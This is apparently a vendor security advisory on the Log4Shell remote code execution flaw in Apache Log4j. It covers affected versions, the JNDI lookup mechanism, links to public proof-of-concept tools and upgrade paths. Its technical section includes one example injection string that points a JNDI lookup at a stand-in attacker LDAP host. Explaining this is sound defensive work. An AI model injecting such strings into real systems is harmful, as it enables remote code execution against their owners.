CVE-2021-44228: Remote Code Execution vulnerability in org.apache.logging.log4j:log4j-core

What is CVE-2021-44228 About?

Log4j versions prior to 2.16.0 are vulnerable to remote code execution via JNDI features in configuration, log messages, and parameters. Successful exploitation can lead to arbitrary code execution loaded from LDAP servers. Exploiting this vulnerability is relatively easy if an attacker can control log messages or parameters.

Affected Software

org.apache.logging.log4j:log4j-core
- >2.4, <2.12.2
- >2.13.0, <2.15.0
- >2.0-beta9, <2.3.1
com.guicedee.services:log4j-core
- <=1.2.1.2-jre17
org.ops4j.pax.logging:pax-logging-log4j2
- >2.0.0, <2.0.11
- >1.8.0, <1.9.2
- >1.11.0, <1.11.10
- >1.10.0, <1.10.8

Technical Details

This critical vulnerability, commonly known as Log4Shell, affects Apache Log4j2 versions prior to 2.16.0. It stems from the mishandling of JNDI (Java Naming and Directory Interface) lookups within log messages and parameters. When message lookup substitution is enabled, an attacker who can control log messages or log message parameters can inject a JNDI lookup string (e.g., `${jndi:ldap://attacker.com/a}`). Log4j, trying to resolve this string, will perform a JNDI lookup, often via LDAP, to a server controlled by the attacker. This malicious server can then return a serialized Java object containing arbitrary code, which the vulnerable Log4j instance will deserialize and execute. Version 2.15.0 attempted a fix but was incomplete, leading to CVE-2021-45046, with 2.16.0 fully disabling JNDI by default and removing message lookup support.

What is the Impact of CVE-2021-44228?

Successful exploitation may allow attackers to execute arbitrary code on the target system with the privileges of the affected application, leading to complete system compromise, data theft, and denial of service.

What is the Exploitability of CVE-2021-44228?

Exploitation is considered low to moderate complexity. The primary prerequisite is the ability to inject attacker-controlled strings into logs or log message parameters. This can often be achieved without authentication, for example, through user-agent strings in HTTP requests, form submissions, or other common input channels. It is a remote vulnerability, requiring no local access to the victim server. No special privileges are needed on the target system for the initial injection. Risk factors are exceptionally high due to the widespread use of Log4j, the ease of injection, and the significant impact of remote code execution. Many services log external input, making them inherently vulnerable. The presence of 'High confidence exploit' maturity confirms readily available and effective exploit tools.

What are the Known Public Exploits?

PoC Author	Link	Commentary
fullhunt	Link	A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228
kozmer	Link	A Proof-Of-Concept for the CVE-2021-44228 vulnerability.
christophetd	Link	Spring Boot web application vulnerable to Log4Shell (CVE-2021-44228).

What are the Available Fixes for CVE-2021-44228?

Available Upgrade Options

org.apache.logging.log4j:log4j-core
- >2.0-beta9, <2.3.1 → Upgrade to 2.3.1
org.apache.logging.log4j:log4j-core
- >2.4, <2.12.2 → Upgrade to 2.12.2
org.apache.logging.log4j:log4j-core
- >2.13.0, <2.15.0 → Upgrade to 2.15.0
org.ops4j.pax.logging:pax-logging-log4j2
- >1.8.0, <1.9.2 → Upgrade to 1.9.2
org.ops4j.pax.logging:pax-logging-log4j2
- >1.10.0, <1.10.8 → Upgrade to 1.10.8
org.ops4j.pax.logging:pax-logging-log4j2
- >1.11.0, <1.11.10 → Upgrade to 1.11.10
org.ops4j.pax.logging:pax-logging-log4j2
- >2.0.0, <2.0.11 → Upgrade to 2.0.11

Struggling with dependency upgrades?

See how Resolved Security's drop-in replacements make it simple.

Book a demo

Additional Resources

What are Similar Vulnerabilities to CVE-2021-44228?

Similar Vulnerabilities: CVE-2021-45046 , CVE-2021-45105 , CVE-2022-23302 , CVE-2022-23305 , CVE-2022-23307

CVE-2021-44228 Remote Code Execution vulnerability in org.apache.logging.log4j:log4j-core